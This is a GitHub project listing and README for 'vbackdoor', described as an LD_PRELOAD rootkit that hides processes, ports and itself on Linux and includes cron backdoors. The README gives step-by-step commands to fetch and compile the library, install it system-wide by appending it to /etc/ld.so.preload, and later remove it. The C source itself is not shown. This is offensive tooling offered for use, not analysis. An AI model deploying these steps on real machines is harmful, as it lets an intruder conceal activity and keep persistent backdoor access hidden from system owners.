https://github.com/veo/vbackdoor
Hide process,port,self under Linux using the ld_preload
https://github.com/veo/vbackdoor
backdoor linux-hooking rookit
Last synced: 4 months ago
JSON representation
Hide process,port,self under Linux using the ld_preload
- Host: GitHub
- URL: https://github.com/veo/vbackdoor
- Owner: veo
- Created: 2021-07-22T01:40:20.000Z (over 4 years ago)
- Default Branch: main
- Last Pushed: 2021-11-18T03:38:49.000Z (about 4 years ago)
- Last Synced: 2025-04-27T21:35:07.036Z (10 months ago)
- Topics: backdoor, linux-hooking, rookit
- Language: C
- Homepage:
- Size: 11.7 KB
- Stars: 163
- Watchers: 10
- Forks: 52
- Open Issues: 1
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# vbackdoor
[中文](https://github.com/veo/vbackdoor/blob/main/README_cn.md)
Hide process,port,self under Linux using the LD_PRELOAD rootkit.
### Compile the library
```
git clone https://github.com/veo/vbackdoor.git
cd vbackdoor
vi vbackdoor.c
make
sudo mv vbackdoor.so /usr/local/lib/
```
or
```
wget https://raw.githubusercontent.com/veo/vbackdoor/main/vbackdoor.c
vi vbackdoor.c
gcc -Wall -fPIC -shared -o vbackdoor.so vbackdoor.c -ldl
sudo mv vbackdoor.so /usr/local/lib/
```
### Load it with the global dynamic linker
```
echo /usr/local/lib/vbackdoor.so >> /etc/ld.so.preload
```
### Remove
```
vi /etc/ld.so.preload
```
and delete string "/usr/local/lib/vbackdoor.so"
or
use busybox
```
busybox rm -rf /etc/ld.so.preload
```
* Process hiding
* LD_PRELOAD hiding
* Network hiding
* cron Backdoors